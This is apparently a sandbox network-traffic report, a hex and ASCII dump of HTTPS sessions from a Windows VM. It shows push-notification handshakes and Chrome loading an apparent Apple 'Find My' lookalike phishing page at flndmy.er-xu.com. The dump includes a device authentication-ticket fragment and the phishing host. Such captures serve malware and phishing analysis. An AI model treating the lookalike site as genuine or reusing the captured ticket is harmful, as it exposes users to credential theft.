2025-01-13 00:49:11 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-13 00:49:11 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 43 6e 52 6b 64 37 79 33 30 57 34 47 52 6a 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 34 30 39 36 65 39 66 30 36 63 37 61 34 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 45 2b 7a 48 4d 6e 30 63 46 79 47 75 30 6f 35 62 69 7a 4b 42 31 78 37 65 49 50 45 79 49 55 72 4f 48 6a 2f 53 53 7a 71 78 30 4d 77 34 2b 7a 57 77 46 57 55 43 41 50 32 55 76 67 4d 31 55 4d 51 35 2f 4d 67 67 52 6f 78 77 72 74 57 4b 45 55 79 79 4e 6c 6a 6b 62 4f 4e 37 4f 4f 5a 47 4f 2b 4b 2f 58 2b 6a 34 39 4e 39 74 58 39 78 55 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: OCnRkd7y30W4GRjs.2Context: 1f4096e9f06c7a4c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARE+zHMn0cFyGu0o5bizKB1x7eIPEyIUrOHj/SSzqx0Mw4+zWwFWUCAP2UvgM1UMQ5/MggRoxwrtWKEUyyNljkbON7OOZGO+K/X+j49N9tX9xU
2025-01-13 00:49:11 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 43 6e 52 6b 64 37 79 33 30 57 34 47 52 6a 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 34 30 39 36 65 39 66 30 36 63 37 61 34 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: OCnRkd7y30W4GRjs.3Context: 1f4096e9f06c7a4c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-13 00:49:11 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-13 00:49:11 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 6d 4c 46 30 35 6d 52 67 45 75 70 44 74 61 4b 6e 5a 36 62 34 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7mLF05mRgEupDtaKnZ6b4w.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	53512	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:24 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 4c 33 37 59 59 2f 63 38 55 53 51 4e 6f 54 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 38 61 34 34 38 38 35 34 30 66 65 33 30 31 65 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: NL37YY/c8USQNoTG.1Context: 38a4488540fe301e
2025-01-13 00:49:24 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-13 00:49:24 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 4c 33 37 59 59 2f 63 38 55 53 51 4e 6f 54 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 38 61 34 34 38 38 35 34 30 66 65 33 30 31 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 45 2b 7a 48 4d 6e 30 63 46 79 47 75 30 6f 35 62 69 7a 4b 42 31 78 37 65 49 50 45 79 49 55 72 4f 48 6a 2f 53 53 7a 71 78 30 4d 77 34 2b 7a 57 77 46 57 55 43 41 50 32 55 76 67 4d 31 55 4d 51 35 2f 4d 67 67 52 6f 78 77 72 74 57 4b 45 55 79 79 4e 6c 6a 6b 62 4f 4e 37 4f 4f 5a 47 4f 2b 4b 2f 58 2b 6a 34 39 4e 39 74 58 39 78 55 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: NL37YY/c8USQNoTG.2Context: 38a4488540fe301e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARE+zHMn0cFyGu0o5bizKB1x7eIPEyIUrOHj/SSzqx0Mw4+zWwFWUCAP2UvgM1UMQ5/MggRoxwrtWKEUyyNljkbON7OOZGO+K/X+j49N9tX9xU
2025-01-13 00:49:24 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 4c 33 37 59 59 2f 63 38 55 53 51 4e 6f 54 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 38 61 34 34 38 38 35 34 30 66 65 33 30 31 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: NL37YY/c8USQNoTG.3Context: 38a4488540fe301e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-13 00:49:24 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-13 00:49:24 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 39 4f 45 4e 67 61 6e 67 6d 55 75 4a 78 77 4d 30 56 4a 49 76 68 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 9OENgangmUuJxwM0VJIvhg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	53495	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:26 UTC	676	OUT	GET /aU3V88/c1.php HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:32 UTC	185	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:26 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-13 00:49:32 UTC	8007	IN	Data Raw: 33 65 35 36 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 73 32 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 63 73 73 2f 61 70 70 65 Data Ascii: 3e56<html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="css/fonts2.css" type="text/css"> <link rel="stylesheet" type="text/css" media="screen" href="css/appe
2025-01-13 00:49:32 UTC	7957	IN	Data Raw: 58 48 6f 42 71 57 52 2f 54 48 6e 66 76 65 50 75 79 6e 42 42 67 77 55 71 43 39 44 48 31 64 64 2f 33 41 41 46 41 78 37 71 67 67 30 77 6f 72 57 5a 73 71 70 62 76 78 75 74 31 50 42 5a 30 56 37 4d 39 51 4b 55 67 74 4f 38 70 78 65 47 50 4f 2b 73 68 37 59 71 75 73 53 58 45 4c 53 62 36 47 2f 56 44 52 6a 6f 77 51 49 37 31 51 4c 71 36 33 2b 54 50 71 2f 72 69 2b 6b 64 4d 5a 6a 77 66 48 54 53 67 74 45 73 58 6e 51 4d 6f 4a 4f 51 58 48 74 50 4c 77 7a 56 77 39 74 36 69 4b 74 58 4b 6a 2b 70 79 66 4f 68 6e 58 70 44 68 75 73 61 4c 46 42 62 67 4c 35 4f 6e 37 63 58 42 51 76 31 4d 4c 65 37 59 4c 51 56 4c 7a 6f 47 30 4c 70 69 45 45 37 61 66 36 6e 69 31 79 70 36 78 37 4f 67 73 58 64 73 54 4f 42 4a 67 55 75 58 57 48 78 39 54 33 38 42 63 4a 56 65 35 76 35 4d 72 57 65 67 42 77 76 Data Ascii: XHoBqWR/THnfvePuynBBgwUqC9DH1dd/3AAFAx7qgg0worWZsqpbvxut1PBZ0V7M9QKUgtO8pxeGPO+sh7YqusSXELSb6G/VDRjowQI71QLq63+TPq/ri+kdMZjwfHTSgtEsXnQMoJOQXHtPLwzVw9t6iKtXKj+pyfOhnXpDhusaLFBbgL5On7cXBQv1MLe7YLQVLzoG0LpiEE7af6ni1yp6x7OgsXdsTOBJgUuXWHx9T38BcJVe5v5MrWegBwv
2025-01-13 00:49:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 00:49:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 33 4d 38 39 66 2f 34 63 79 38 32 59 36 38 4b 42 57 77 6e 34 33 63 32 36 55 66 68 54 50 54 6f 31 79 38 36 36 6b 6a 76 4a 66 47 2b 70 6c 75 64 31 50 31 4b 7a 4f 51 64 6b 32 45 5a 6f 75 4c 39 61 71 2b 64 63 6c 53 41 53 67 69 4f 59 55 58 46 69 72 4f 2b 6e 46 54 62 46 70 4b 4f 34 49 76 72 4d 70 53 48 52 37 6f 54 30 34 34 75 47 30 59 70 71 6e 77 2f 54 42 49 76 35 78 53 42 72 42 79 39 4a 55 79 53 45 64 2f 6c 61 6e 6c 34 70 4a 30 58 65 71 67 31 4d 65 49 36 6e 54 63 6d 56 79 6f 64 49 37 44 6e 55 79 2b 6e 2b 31 52 58 4e 79 61 34 77 78 67 37 47 71 42 50 79 34 4d 61 4b 44 47 33 30 31 7a 30 74 42 43 37 6f 6d 45 6f 34 4e 54 2f 34 73 47 34 36 58 54 77 4f 4c 6a 4a 67 46 51 52 76 38 63 5a 72 30 6f 30 5a 74 30 6e 5a 52 7a 38 35 54 2b 76 56 41 6a 75 61 34 Data Ascii: 1f403M89f/4cy82Y68KBWwn43c26UfhTPTo1y866kjvJfG+plud1P1KzOQdk2EZouL9aq+dclSASgiOYUXFirO+nFTbFpKO4IvrMpSHR7oT044uG0Ypqnw/TBIv5xSBrBy9JUySEd/lanl4pJ0Xeqg1MeI6nTcmVyodI7DnUy+n+1RXNya4wxg7GqBPy4MaKDG301z0tBC7omEo4NT/4sG46XTwOLjJgFQRv8cZr0o0Zt0nZRz85T+vVAjua4
2025-01-13 00:49:32 UTC	7822	IN	Data Raw: 73 38 73 4e 6a 5a 42 30 68 73 77 31 50 58 4e 4f 73 41 61 66 4a 34 65 75 6d 58 43 6d 66 37 56 4e 30 6c 59 7a 43 61 52 4d 39 2b 53 33 41 74 61 56 4c 61 70 49 4d 61 30 4f 76 4f 4e 41 49 6f 45 58 30 73 68 4e 7a 42 64 43 62 39 5a 50 6d 35 39 32 67 6e 70 75 47 6c 65 73 4f 30 57 76 31 75 6c 79 6d 34 2b 6e 65 45 62 59 59 73 65 6b 51 55 53 4c 6b 4b 32 5a 46 6c 76 72 68 6c 55 4f 45 36 55 34 31 32 79 4a 4a 32 2b 76 51 54 64 64 35 30 41 43 6a 42 6b 66 63 6b 36 34 4e 53 4f 65 6a 57 37 37 6f 68 79 69 4a 6a 74 49 6f 56 4e 66 53 72 72 4e 75 51 46 75 4b 31 64 75 6d 2b 64 5a 72 46 35 73 72 39 6e 5a 7a 75 69 32 35 64 4f 6e 7a 78 73 4f 46 62 4f 70 4e 2b 72 6e 6b 2f 5a 6f 44 31 4c 5a 48 66 7a 63 39 53 35 32 54 79 73 43 50 59 35 4a 41 56 6c 35 6e 64 38 76 55 65 55 6e 5a 71 49 Data Ascii: s8sNjZB0hsw1PXNOsAafJ4eumXCmf7VN0lYzCaRM9+S3AtaVLapIMa0OvONAIoEX0shNzBdCb9ZPm592gnpuGlesO0Wv1ulym4+neEbYYsekQUSLkK2ZFlvrhlUOE6U412yJJ2+vQTdd50ACjBkfck64NSOejW77ohyiJjtIoVNfSrrNuQFuK1dum+dZrF5sr9nZzui25dOnzxsOFbOpN+rnk/ZoD1LZHfzc9S52TysCPY5JAVl5nd8vUeUnZqI
2025-01-13 00:49:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 00:49:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 72 6e 6e 4a 2f 54 45 2b 6c 6d 74 6b 74 32 4f 72 69 45 4d 46 72 67 59 46 74 42 62 68 73 4d 61 30 66 33 6d 66 66 66 64 39 2f 76 71 69 79 73 4d 5a 31 6e 49 56 46 33 78 66 70 4f 74 65 77 4c 58 47 71 39 52 76 43 44 6b 4f 65 63 30 7a 30 6c 62 7a 33 58 65 57 56 2f 6e 65 51 45 55 52 62 4f 41 74 4a 36 54 4d 74 52 6c 58 67 70 41 41 61 71 65 52 48 6a 78 4a 52 6b 67 35 71 66 51 41 4a 64 44 58 76 6a 71 4e 37 7a 68 44 65 38 57 30 48 39 36 41 43 72 57 48 73 4b 46 73 67 44 41 31 45 6a 76 33 2b 6c 4c 43 4c 2f 48 48 31 73 44 51 67 37 70 6a 33 6d 6d 2b 6d 65 38 77 78 64 67 41 35 67 41 31 41 75 66 39 59 49 51 6f 30 58 61 56 41 39 72 53 56 38 49 63 4b 4c 6e 67 67 45 55 5a 64 4d 38 61 51 31 53 44 52 6b 57 4e 49 78 59 31 4b 51 37 67 4b 72 30 49 76 4e 53 51 43 Data Ascii: 1f40rnnJ/TE+lmtkt2OriEMFrgYFtBbhsMa0f3mfffd9/vqiysMZ1nIVF3xfpOtewLXGq9RvCDkOec0z0lbz3XeWV/neQEURbOAtJ6TMtRlXgpAAaqeRHjxJRkg5qfQAJdDXvjqN7zhDe8W0H96ACrWHsKFsgDA1Ejv3+lLCL/HH1sDQg7pj3mm+me8wxdgA5gA1Auf9YIQo0XaVA9rSV8IcKLnggEUZdM8aQ1SDRkWNIxY1KQ7gKr0IvNSQC
2025-01-13 00:49:32 UTC	6672	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 65 6c 64 2d 77 72 61 70 20 66 6f 72 63 65 2d 6c 74 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </div> <div class="field-wrap force-ltr">
2025-01-13 00:49:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 00:49:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	53496	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:32 UTC	573	OUT	GET /aU3V88/css/fonts2.css HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:33 UTC	231	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 00:49:32 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 15 Aug 2024 23:42:42 GMT Accept-Ranges: bytes Content-Length: 8479 Content-Type: text/css
2025-01-13 00:49:33 UTC	7961	IN	Data Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 79 72 69 61 64 20 53 65 74 20 50 72 6f 27 3b 0d 0d 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0d 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 3b 0d 0d 0a 09 73 72 63 3a 6c 6f 63 61 6c 28 27 c3 a2 cb 9c c2 ba c3 af c2 b8 c5 bd 27 29 2c 20 75 72 6c 28 22 6d 79 72 69 61 64 2d 73 65 74 2d 70 72 6f 5f 75 6c 74 72 61 6c 69 67 68 74 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 22 6d 79 72 69 61 64 2d 73 65 74 2d 70 72 6f 5f 75 6c 74 72 61 6c 69 67 68 74 2e 74 74 66 22 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 3b 0d 0d 0a 09 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 32 20 41 Data Ascii: @font-face {font-family:'Myriad Set Pro';font-style:normal;font-weight:100;src:local(''), url("myriad-set-pro_ultralight.woff") format("woff"), url("myriad-set-pro_ultralight.ttf") format("truetype");/* Copyright (c) 1992 A
2025-01-13 00:49:33 UTC	518	IN	Data Raw: 68 74 20 28 63 29 20 31 39 39 32 20 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 20 4d 79 72 69 61 64 20 69 73 20 61 20 74 72 61 64 65 6d 61 72 6b 20 6f 66 20 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 2e 20 2a 2f 0d 0d 0a 7d 0d 0d 0a 0d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 79 72 69 61 64 20 53 65 74 20 50 72 6f 27 3b 0d 0d 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0d 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 0d 0d 0a 09 73 72 63 3a 75 72 6c 28 22 6d 79 72 69 61 64 2d 73 65 74 2d 70 72 6f 5f 74 65 78 74 2e 65 6f 74 22 29 3b 0d 0d 0a Data Ascii: ht (c) 1992 Adobe Systems Incorporated. All Rights Reserved. Myriad is a trademark of Adobe Systems Incorporated. */}@font-face {font-family:'Myriad Set Pro';font-style:normal;font-weight:400;src:url("myriad-set-pro_text.eot");

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	53570	151.101.2.137	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:32 UTC	534	OUT	GET /jquery-2.2.4.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.flndmy.er-xu.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:32 UTC	611	IN	HTTP/1.1 200 OK Connection: close Content-Length: 257551 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-3ee0f" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 751311 Date: Mon, 13 Jan 2025 00:49:32 GMT X-Served-By: cache-lga21969-LGA, cache-ewr-kewr1740061-EWR X-Cache: HIT, HIT X-Cache-Hits: 69, 0 X-Timer: S1736729373.860802,VS0,VE1 Vary: Accept-Encoding
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 32 2e 32 2e 34 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 36 2d 30 35 2d 32 30 54 31 Data Ascii: /! jQuery JavaScript Library v2.2.4 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright jQuery Foundation and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2016-05-20T1
